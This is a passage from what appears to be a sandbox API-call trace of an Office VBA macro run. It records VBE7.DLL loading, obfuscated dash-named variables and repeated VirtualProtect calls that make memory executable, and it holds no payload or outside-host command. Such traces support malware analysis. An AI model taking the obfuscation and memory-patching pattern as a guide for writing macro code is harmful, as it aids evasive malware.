_Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb1a452c, cbMultiByte=8, lpWideCharStr=0x1146058c, cchWideChar=18 | out: lpWideCharStr="fbDGioXv") returned 8 [0110.254] memcpy (in: _Dst=0xcb3cf2c, _Src=0x11460588, _Size=0x16 | out: _Dst=0xcb3cf2c) returned 0xcb3cf2c [0110.254] memcpy (in: _Dst=0xd01516c, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0110.255] memcpy (in: _Dst=0xd01516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0110.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d0a, cbMultiByte=6, lpWideCharStr=0x1976c4, cchWideChar=7 | out: lpWideCharStr="VbGet") returned 6 [0110.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c024e, cbMultiByte=6, lpWideCharStr=0x197724, cchWideChar=7 | out: lpWideCharStr="VbGet") returned 6 [0110.255] memcpy (in: _Dst=0xc8326a0, _Src=0xb25cbd8, _Size=0x4 | out: _Dst=0xc8326a0) returned 0xc8326a0 [0110.256] memcpy (in: _Dst=0xd015170, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0110.256] memcpy (in: _Dst=0xd015174, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015174) returned 0xd015174 [0110.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d2e, cbMultiByte=11, lpWideCharStr=0x1976c4, cchWideChar=12 | out: lpWideCharStr="CallByName") returned 11 [0110.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0202, cbMultiByte=11, lpWideCharStr=0x197724, cchWideChar=12 | out: lpWideCharStr="CallByName") returned 11 [0110.257] memcpy (in: _Dst=0x1976ec, _Src=0x197760, _Size=0x8 | out: _Dst=0x1976ec) returned 0x1976ec [0110.257] memcpy (in: _Dst=0xcb64830, _Src=0x1976ec, _Size=0x8 | out: _Dst=0xcb64830) returned 0xcb64830 [0110.257] CRetailMalloc_Alloc () returned 0xc856f40 [0110.257] CRetailMalloc_Free () returned 0x1 [0110.257] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d56, cbMultiByte=20, lpWideCharStr=0x1976c4, cchWideChar=21 | out: lpWideCharStr="——–—————––——––—––––") returned 20 [0110.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0792, cbMultiByte=20, lpWideCharStr=0x197724, cchWideChar=21 | out: lpWideCharStr="——–—————––——––—––––") returned 20 [0110.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0792, cbMultiByte=20, lpWideCharStr=0x197724, cchWideChar=21 | out: lpWideCharStr="——–—————––——––—––––") returned 20 [0110.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0792, cbMultiByte=20, lpWideCharStr=0x197724, cchWideChar=21 | out: lpWideCharStr="——–—————––——––—––––") returned 20 [0110.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0792, cbMultiByte=20, lpWideCharStr=0x197724, cchWideChar=21 | out: lpWideCharStr="——–—————––——––—––––") returned 20 [0110.258] CRetailMalloc_Alloc () returned 0xc856f40 [0110.258] _mbscpy_s (in: _Dst=0xc856f40, _DstSizeInBytes=0x14, _Src=0x112c0792 | out: _Dst=0xc856f40) returned 0x0 [0110.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0a8e, cbMultiByte=27, lpWideCharStr=0x197734, cchWideChar=28 | out: lpWideCharStr="_B_var_——–—————––——––—––––") returned 27 [0110.259] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x14, _Src=0x112c0792 | out: _Dst=0x19779c) returned 0x0 [0110.259] CRetailMalloc_Free () returned 0x1 [0110.259] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.259] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.259] memcpy (in: _Dst=0xd01516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0110.259] memcpy (in: _Dst=0xd015168, _Src=0x197714, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.259] memcpy (in: _Dst=0xd015168, _Src=0x197714, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.259] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.259] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0110.260] memcpy (in: _Dst=0xcb3dd94, _Src=0x197944, _Size=0x18 | out: _Dst=0xcb3dd94) returned 0xcb3dd94 [0110.260] CRetailMalloc_Realloc () returned 0xcb3dca8 [0110.260] CRetailMalloc_Free () returned 0x1 [0110.260] GetCurrentProcess () returned 0xffffffff [0110.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0110.260] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.261] GetCurrentProcess () returned 0xffffffff [0110.261] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0110.261] GetCurrentProcess () returned 0xffffffff [0110.261] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0110.261] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.262] GetCurrentProcess () returned 0xffffffff [0110.262] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0110.262] GetCurrentProcess () returned 0xffffffff [0110.262] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0110.262] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.262] GetCurrentProcess () returned 0xffffffff [0110.263] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0110.263] GetCurrentProcess () returned 0xffffffff [0110.263] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0110.263] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.263] GetCurrentProcess () returned 0xffffffff [0110.263] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0110.263] GetCurrentProcess () returned 0xffffffff [0110.263] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0110.263] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.264] GetCurrentProcess () returned 0xffffffff [0110.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0110.264] GetCurrentProcess () returned 0xffffffff [0110.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0110.264] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.264] GetCurrentProcess () returned 0xffffffff [0110.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0110.264] GetCurrentProcess () returned 0xffffffff [0110.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0110.264] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.264] GetCurrentProcess () returned 0xffffffff [0110.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0110.265] GetCurrentProcess () returned 0xffffffff [0110.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0110.265] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.265] GetCurrentProcess () returned 0xffffffff [0110.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0110.265] GetCurrentProcess () returned 0xffffffff [0110.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0110.265] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.265] GetCurrentProcess () returned 0xffffffff [0110.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0110.265] GetCurrentProcess () returned 0xffffffff [0110.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0110.266] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.266] GetCurrentProcess () returned 0xffffffff [0110.266] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0110.266] GetCurrentProcess () returned 0xffffffff [0110.266] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0110.266] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.266] GetCurrentProcess () returned 0xffffffff [0110.266] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0110.266] GetCurrentProcess () returned 0xffffffff [0110.266] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0110.266] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.267] GetCurrentProcess () returned 0xffffffff [0110.267] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0110.267] GetCurrentProcess () returned 0xffffffff [0110.267] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0110.267] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.267] GetCurrentProcess () returned 0xffffffff [0110.267] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0110.267] GetCurrentProcess () returned 0xffffffff [0110.267] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0110.267] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.268] GetCurrentProcess () returned 0xffffffff [0110.268] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0110.268] GetCurrentProcess () returned 0xffffffff [0110.268] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0110.268] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.268] GetCurrentProcess () returned 0xffffffff [0110.268] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0110.268] GetCurrentProcess () returned 0xffffffff [0110.268] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0110.268] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.269] GetCurrentProcess () returned 0xffffffff [0110.269] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0110.269] GetCurrentProcess () returned 0xffffffff [0110.269] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0110.269] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.269] GetCurrentProcess () returned 0xffffffff [0110.269] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0110.269] GetCurrentProcess () returned 0xffffffff [0110.269] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0110.269] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.270] GetCurrentProcess () returned 0xffffffff [0110.270] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0110.270] GetCurrentProcess () returned 0xffffffff [0110.270] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0110.270] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.271] GetCurrentProcess () returned 0xffffffff [0110.271] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0110.271] GetCurrentProcess () returned 0xffffffff [0110.271] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0110.271] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.271] GetCurrentProcess () returned 0xffffffff [0110.271] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0110.271] GetCurrentProcess () returned 0xffffffff [0110.271] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0110.271] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.271] GetCurrentProcess () returned 0xffffffff [0110.271] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0110.272] GetCurrentProcess () returned 0xffffffff [0110.272] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0110.272] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.272] GetCurrentProcess () returned 0xffffffff [0110.272] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0110.272] GetCurrentProcess () returned 0xffffffff [0110.272] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0110.272] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.272] GetCurrentProcess () returned 0xffffffff [0110.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0110.273] GetCurrentProcess () returned 0xffffffff [0110.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0110.273] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.273] GetCurrentProcess () returned 0xffffffff [0110.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0110.273] GetCurrentProcess () returned 0xffffffff [0110.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0110.273] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.273] GetCurrentProcess () returned 0xffffffff [0110.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0110.274] GetCurrentProcess () returned 0xffffffff [0110.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0110.274] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.274] GetCurrentProcess () returned 0xffffffff [0110.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0110.274] GetCurrentProcess () returned 0xffffffff [0110.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0110.274] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.274] GetCurrentProcess () returned 0xffffffff [0110.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0110.275] GetCurrentProcess () returned 0xffffffff [0110.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0110.275] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.275] GetCurrentProcess () returned 0xffffffff [0110.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0110.275] GetCurrentProcess () returned 0xffffffff [0110.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0110.275] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.275] GetCurrentProcess () returned 0xffffffff [0110.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0110.276] GetCurrentProcess () returned 0xffffffff [0110.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0110.276] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.276] GetCurrentProcess () returned 0xffffffff [0110.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0110.276] GetCurrentProcess () returned 0xffffffff [0110.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0110.276] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0110.277] GetCurrentProcess () returned 0xffffffff [0110.277] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0110.277] SetErrorMode (uMode=0x8001) returned 0x8001 [0110.277] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0110.277] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0110.277] SetErrorMode (uMode=0x8001) returned 0x8001 [0110.278] GetProcAddress (hModule=0x693e0000, lpProcName=0x2cb) returned 0x695b04b4 [0110.310] GetAsyncKeyState (vKey=3) returned 0 [0110.310] CRetailMalloc_Alloc () returned 0xcb3de00 [0110.310] memcpy (in: _Dst=0xd015168, _Src=0x19779c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.311] memcpy (in: _Dst=0xcb3de20, _Src=0x197804, _Size=0x18 | out: _Dst=0xcb3de20) returned 0xcb3de20 [0110.311] CRetailMalloc_Realloc () returned 0xcb3de00 [0110.311] CRetailMalloc_Free () returned 0x1 [0110.311] GetCurrentProcess () returned 0xffffffff [0110.311] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0110.311] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.312] GetCurrentProcess () returned 0xffffffff [0110.312] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0110.312] GetCurrentProcess () returned 0xffffffff [0110.312] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0110.312] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.312] GetCurrentProcess () returned 0xffffffff [0110.312] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0110.312] GetCurrentProcess () returned 0xffffffff [0110.312] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0110.312] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.313] GetCurrentProcess () returned 0xffffffff [0110.313] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0110.313] GetCurrentProcess () returned 0xffffffff [0110.313] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0110.313] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.313] GetCurrentProcess () returned 0xffffffff [0110.313] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0110.314] GetCurrentProcess () returned 0xffffffff [0110.314] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0110.314] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.314] GetCurrentProcess () returned 0xffffffff [0110.314] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0110.314] GetCurrentProcess () returned 0xffffffff [0110.314] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0110.314] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.315] GetCurrentProcess () returned 0xffffffff [0110.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0110.315] GetCurrentProcess () returned 0xffffffff [0110.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0110.315] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.315] GetCurrentProcess () returned 0xffffffff [0110.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0110.315] GetCurrentProcess () returned 0xffffffff [0110.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0110.315] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.316] GetCurrentProcess () returned 0xffffffff [0110.316] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0110.316] GetCurrentProcess () returned 0xffffffff [0110.316] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0110.316] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.317] GetCurrentProcess () returned 0xffffffff [0110.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0110.317] GetCurrentProcess () returned 0xffffffff [0110.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0110.317] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.317] GetCurrentProcess () returned 0xffffffff [0110.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0110.317] GetCurrentProcess () returned 0xffffffff [0110.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0110.317] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.318] GetCurrentProcess () returned 0xffffffff [0110.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0110.318] GetCurrentProcess () returned 0xffffffff [0110.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0110.318] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.318] GetCurrentProcess () returned 0xffffffff [0110.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0110.318] GetCurrentProcess () returned 0xffffffff [0110.319] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0110.319] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.319] GetCurrentProcess () returned 0xffffffff [0110.319] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0110.319] GetCurrentProcess () returned 0xffffffff [0110.319] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0110.319] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: 